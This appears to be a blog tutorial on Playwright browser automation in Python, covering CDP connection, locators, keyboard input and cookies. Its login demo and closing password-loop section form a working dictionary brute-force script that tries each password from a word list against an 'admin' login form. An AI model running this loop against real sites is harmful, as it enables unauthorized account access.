playwright-python web automation

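This article collects code examples for browser automation with Playwright. It covers connecting to an existing Chrome browser, page operations, and locating and interacting with elements. The main topics are:

1) connecting to a running Chrome browser over the CDP protocol;
2) page navigation, screenshots and waiting;
3) locating elements with XPath and reading their text;
4) typing text, clicking and other interactions;
5) cookie management;
6) reading a dictionary (word-list) file to drive automated tests.

The snippets can be reused for web automation testing, data scraping and similar tasks.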

大山猛seven


Published 2025-09-03 10:48:21

Introduction

https://playwright.nodejs.cn/python/docs/intro

Demo

Launch Chrome with remote debugging enabled

google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"
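To start the same debug-enabled Chrome from a Python script, you can build the command as an argument list and pass it to `subprocess.Popen`. This is a minimal sketch. The helper names `chrome_debug_command` and `launch_chrome` are hypothetical. The executable name `google-chrome` is taken from the command above and differs between systems, for example `chromium` or a full path on Windows or macOS. In an argument list the quotes around the profile path are not needed, because no shell is involved.

```python
import subprocess


def chrome_debug_command(port=9222, user_data_dir="/tmp/chrome-dev-profile",
                         executable="google-chrome"):
    """Build the argument list for launching Chrome with remote debugging enabled.

    Hypothetical helper: the defaults mirror the shell command in this article.
    """
    return [
        executable,
        f"--remote-debugging-port={port}",
        f"--user-data-dir={user_data_dir}",
    ]


def launch_chrome(**kwargs):
    """Start Chrome in the background and return the Popen handle (not waited on)."""
    return subprocess.Popen(chrome_debug_command(**kwargs))
```

Call `proc = launch_chrome()` before `connect_over_cdp("http://localhost:9222")`. Chrome may need a moment before the port accepts connections.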

Demo: iterating over matched elements

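from playwright.sync_api import sync_playwright

import utils.file  # the author's own helper module (not shown in this article)
import utils.time  # the author's own helper module (not shown in this article)

with sync_playwright() as p:
    # Connect to the already running Chrome instance
    browser = p.chromium.connect_over_cdp("http://localhost:9222")
    # Reuse the first tab of the first existing browser context
    page = browser.contexts[0].pages[0]
    titles = page.locator("//h3/div")
    results = []
    for i in range(titles.count()):
        text = titles.nth(i).text_content()
        print(text)
        results.append(text)
        # utils.time.random_pause()  # optional random pause (author's helper)
    # Save the collected text with the author's helper
    utils.file.write_file_unique("url", results)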
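`utils.file.write_file_unique` is the author's own helper, and the article does not show it. The sketch below is a hypothetical stand-in that assumes "unique" means "append only lines not already in the file". It also skips the `None` values that `text_content()` can return.

```python
from pathlib import Path


def write_lines_unique(path, lines):
    """Append each line to the file unless it is already present.

    Hypothetical stand-in for the author's utils.file.write_file_unique,
    whose real behaviour is not shown in the article.
    Returns the list of lines that were actually written.
    """
    file = Path(path)
    text = file.read_text(encoding="utf-8") if file.exists() else ""
    existing = set(text.splitlines())
    written = []
    for line in lines:
        if line is None:
            continue  # text_content() can return None
        line = line.strip()
        if line and line not in existing:
            existing.add(line)
            written.append(line)
    if written:
        # Make sure we start on a fresh line if the file lacks a trailing newline
        prefix = "\n" if text and not text.endswith("\n") else ""
        with file.open("a", encoding="utf-8") as f:
            f.write(prefix + "\n".join(written) + "\n")
    return written
```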

Demo: filling in the login form

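from playwright.sync_api import sync_playwright

import utils.file  # the author's own helper module (not shown in this article)


def connect_to_existing_chrome():
    '''
    Start Chrome first with:
    google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"
    Demo: connect to the existing browser and try each password from the
    dictionary on the login form in the current tab.
    '''
    path = './dic.txt'
    # utils.file.readFile is the author's helper, assumed to return one password per entry
    dic_txt = utils.file.readFile(path)

    with sync_playwright() as p:
        # Connect to the already running Chrome instance
        browser = p.chromium.connect_over_cdp("http://localhost:9222")
        page = browser.contexts[0].pages[0]
        username = page.locator("//input[@name='username']")
        password = page.locator("//input[@name='password']")
        login_bt = page.locator("//input[@name='Login']")
        for passwd in dic_txt:
            username.fill("admin")
            password.fill(passwd)
            print(passwd)
            login_bt.click()
            page.wait_for_timeout(500)
            # Locators are re-evaluated on every call: if the Login button
            # is gone, the login is assumed to have succeeded
            if login_bt.count() == 0:
                print(f"Login succeeded with password: {passwd}")
                break

        # browser.close()


if __name__ == "__main__":
    connect_to_existing_chrome()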
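The demo mixes dictionary handling with browser calls. The sketch below separates the two, so you can check the loop logic without a browser. The names `first_working_password` and `try_login` are hypothetical. The success criterion in the commented Playwright callback (the Login button disappearing) is the same assumption the demo makes.

```python
from typing import Callable, Iterable, Optional


def first_working_password(candidates: Iterable[str],
                           try_login: Callable[[str], bool]) -> Optional[str]:
    """Return the first candidate for which try_login(candidate) is True, else None.

    try_login is expected to fill the form, submit it, wait, and report success.
    """
    for candidate in candidates:
        candidate = candidate.strip()
        if not candidate:
            continue  # skip blank dictionary lines
        if try_login(candidate):
            return candidate
    return None


# With Playwright, try_login could wrap the demo's steps (not executed here):
# def try_login(pw):
#     username.fill("admin")
#     password.fill(pw)
#     login_bt.click()
#     page.wait_for_timeout(500)
#     return login_bt.count() == 0
```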

Code snippets

Browser

Launch a browser listening on a remote-debugging port

google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"

Connect to an existing browser

from playwright.sync_api import sync_playwright

with sync_playwright() as p:
    # Connect to the already running Chrome instance
    browser = p.chromium.connect_over_cdp("http://localhost:9222")
    browser.close()
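Before calling `connect_over_cdp`, it helps to check that the debugging port is actually open. This sketch uses only the standard library. It relies on the `/json/version` HTTP endpoint that Chrome serves on the remote-debugging port. The helper name `cdp_websocket_url` is hypothetical.

```python
import http.client
import json
import urllib.request
from typing import Optional


def cdp_websocket_url(endpoint: str = "http://localhost:9222",
                      timeout: float = 2.0) -> Optional[str]:
    """Return Chrome's browser-level WebSocket debugger URL, or None if unavailable.

    A Chrome started with --remote-debugging-port answers GET /json/version
    with a JSON object that includes "webSocketDebuggerUrl".
    """
    url = endpoint.rstrip("/") + "/json/version"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            info = json.load(resp)
    except (OSError, ValueError, http.client.HTTPException):
        # Connection refused, timeout, HTTP error or a non-JSON reply
        return None
    if not isinstance(info, dict):
        return None
    return info.get("webSocketDebuggerUrl")
```

Typical use: `if cdp_websocket_url() is None: print("Chrome is not listening on port 9222")`.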

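Add and remove cookies

import time

# A cookie needs either "url" or a "domain" + "path" pair; Playwright rejects both together
login_cookies = [
    {
        "name": "user_id",
        "value": "123456",
        "domain": ".example.com",  # applies to all subdomains (e.g. blog.example.com)
        "path": "/",               # applies to every path on the site
        "expires": int(time.time()) + 7 * 24 * 3600,  # Unix timestamp in SECONDS (here: one week from now)
        "httpOnly": True,          # not readable from page JavaScript, for security
        "secure": True,            # only sent over HTTPS
        "sameSite": "Lax",         # cross-site sending rule: "Strict", "Lax" or "None"
    },
    {
        "name": "session_token",
        "value": "abcdef123456xyz",
        "url": "https://www.example.com",  # root URL of the site the cookie belongs to
        "secure": True,
    },
]

context.add_cookies(login_cookies)  # context is a BrowserContext, e.g. browser.contexts[0]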

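# Remove all cookies, or only those matching the filters
# (the name/domain/path filters require Playwright 1.43 or later)
context.clear_cookies()
context.clear_cookies(name="session-id")
context.clear_cookies(domain="my-origin.com")
context.clear_cookies(path="/api/v1")
context.clear_cookies(name="session-id", domain="my-origin.com")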
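Cookie dicts are easy to get wrong. Playwright expects either `url` or a `domain` + `path` pair, and it expects `expires` as a Unix timestamp in seconds. A small pure-Python check can catch these mistakes before you call `add_cookies`. The helper `cookie_problems` is hypothetical and not part of Playwright. Its rule that values above 1e11 must be milliseconds is a heuristic assumption.

```python
import time
from typing import List, Optional

VALID_SAME_SITE = {"Strict", "Lax", "None"}


def cookie_problems(cookie: dict, now: Optional[float] = None) -> List[str]:
    """Return human-readable problems with a cookie dict meant for add_cookies().

    Checks the url vs. domain/path rule, the seconds-based expires value
    and the sameSite spelling. An empty list means no problem was found.
    """
    now = time.time() if now is None else now
    problems = []
    if not cookie.get("name") or "value" not in cookie:
        problems.append("name and value are required")
    has_url = "url" in cookie
    if has_url and ("domain" in cookie or "path" in cookie):
        problems.append("use either url or domain+path, not both")
    if not has_url and not ("domain" in cookie and "path" in cookie):
        problems.append("missing url or domain+path pair")
    expires = cookie.get("expires")
    if expires is not None and expires != -1:  # -1 means a session cookie
        if expires > 1e11:  # heuristic: seconds this large are thousands of years away
            problems.append("expires looks like milliseconds; use seconds")
        elif expires < now:
            problems.append("expires is in the past, so the cookie is already expired")
    if "sameSite" in cookie and cookie["sameSite"] not in VALID_SAME_SITE:
        problems.append("sameSite must be Strict, Lax or None")
    return problems
```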

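Page

Create a new page

page = browser.new_page()  # opens the page in a new browser context

Use the current page

page = browser.contexts[0].pages[0]  # first tab of the first existing context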

Navigate to a page

page.goto("http://aliyun.bd7oxy.top")

Take a screenshot

page.screenshot(path="example.png")

Fixed wait

page.wait_for_timeout(1500)  # pause for 1500 ms
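A fixed pause is either wasted time or too short. The sketch below polls a condition and stops as soon as it holds. `wait_until` is a hypothetical helper, not a Playwright API. Playwright's own auto-waiting and `locator.wait_for()` already cover many of the same cases. The `sleep_ms` parameter lets you route the pause through `page.wait_for_timeout` instead of `time.sleep`.

```python
import time
from typing import Callable, Optional


def wait_until(predicate: Callable[[], bool], timeout_ms: int = 5000,
               interval_ms: int = 100,
               sleep_ms: Optional[Callable[[int], None]] = None) -> bool:
    """Poll predicate() until it returns True or timeout_ms elapses.

    Returns True on success, False on timeout. sleep_ms pauses for the given
    number of milliseconds; it defaults to time.sleep, but with Playwright
    page.wait_for_timeout can be passed instead.
    """
    if sleep_ms is None:
        sleep_ms = lambda ms: time.sleep(ms / 1000)
    deadline = time.monotonic() + timeout_ms / 1000
    while True:
        if predicate():
            return True
        if time.monotonic() >= deadline:
            return False
        sleep_ms(interval_ms)
```

Usage with Playwright: `wait_until(lambda: page.locator("//input[@name='Login']").count() == 0, timeout_ms=3000, sleep_ms=page.wait_for_timeout)`.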

Elements

Locate elements with XPath


element = page.locator("//h1")  # locate all h1 elements (selectors starting with // are treated as XPath)

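Count matching elements

items.count()

Get an element's text

item.text_content()  # may return None; inner_text() returns the rendered text instead

Wait for an element to become visible

button.wait_for(state="visible")  # wait until the element is visible

Scroll the element into view

item.scroll_into_view_if_needed()

Check whether an element exists

if item.count() == 0:
    print("Element does not exist")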

Handle multiple matched elements

titles = page.locator("//h3/div")
for i in range(titles.count()):
    print(titles.nth(i).text_content())
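Playwright's `Locator.all_text_contents()` returns the text of every match as a list, so you can skip the index loop entirely. This is a sketch; the helper name `collect_texts` is hypothetical. It works on any object with that method, such as `page.locator("//h3/div")`.

```python
def collect_texts(locator) -> list:
    """Return the stripped, non-empty text of every element matched by a Locator.

    Uses Locator.all_text_contents(), which reads all matches in one call
    instead of calling nth(i).text_content() once per element.
    """
    return [text.strip() for text in locator.all_text_contents() if text and text.strip()]
```

Usage: `for title in collect_texts(page.locator("//h3/div")): print(title)`.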

Keyboard

Fill an input

name.fill("admin")

Insert text

page.keyboard.insert_text("嗨")  # dispatches only an input event, no keydown/keyup/keypress

Key presses

page.keyboard.type("Hello World!")
page.keyboard.press("ArrowLeft")
page.keyboard.down("Shift")
for i in range(6):
    page.keyboard.press("ArrowLeft")
page.keyboard.up("Shift")
page.keyboard.press("Backspace")
# result text will end up saying "Hello!"

Click

item.click()

Right-click

item.click(button='right')

Click at an offset

item.click(position={"x": 10, "y": 10})  # relative to the element's top-left corner
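The `position` offset is measured from the top-left corner of the element's padding box, not from the page. You may want to click at, say, 25% of the width regardless of the element's size. In that case, derive the offset from `Locator.bounding_box()`, which returns `x`, `y`, `width` and `height`, or `None` when the element is not visible. This is a sketch; `relative_position` is a hypothetical helper.

```python
from typing import Dict, Optional


def relative_position(box: Optional[Dict[str, float]], fx: float = 0.5,
                      fy: float = 0.5) -> Dict[str, float]:
    """Convert fractions of an element's size into a click offset.

    box is the dict returned by Locator.bounding_box(); the result is relative
    to the element's top-left corner, which is what click(position=...) expects.
    """
    if box is None:
        raise ValueError("element is not visible, bounding_box() returned None")
    return {"x": box["width"] * fx, "y": box["height"] * fy}
```

Usage: `item.click(position=relative_position(item.bounding_box(), 0.25, 0.5))`.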

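Force click

Use this when the element is covered by another element. force=True skips the actionability checks.

# //div is only a placeholder: in strict mode the click fails if the locator matches more than one element
page.locator("//div").click(force=True)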

Reading the dictionary file

def read_passwords_from_file(file_path):
    """Read passwords from a local text file, one password per line."""
    passwords = []
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            # Read every line, stripping the newline and skipping blank lines
            for line in f:
                password = line.strip()
                if password:  # skip blank lines
                    passwords.append(password)
        return passwords
    except FileNotFoundError:
        print(f"Error: file not found: {file_path}")
        return []
    except Exception as e:
        print(f"Error while reading the file: {e}")
        return []

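Iterating over the passwords

# Assumes page, username (the account name), password_field and login_button
# have been set up beforehand, as in the login demo above
passwords = read_passwords_from_file("./dic.txt")
for password in passwords:
    print(f"Trying to log in - username: {username}, password: {password}")
    # Fill in the password
    password_field.fill(password)
    # Click the login button
    login_button.click()
    # Wait for the page to respond
    page.wait_for_timeout(1500)  # adjust the wait time to the actual site
    # Add a login-success check here,
    # and break out of the loop once the login succeeds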
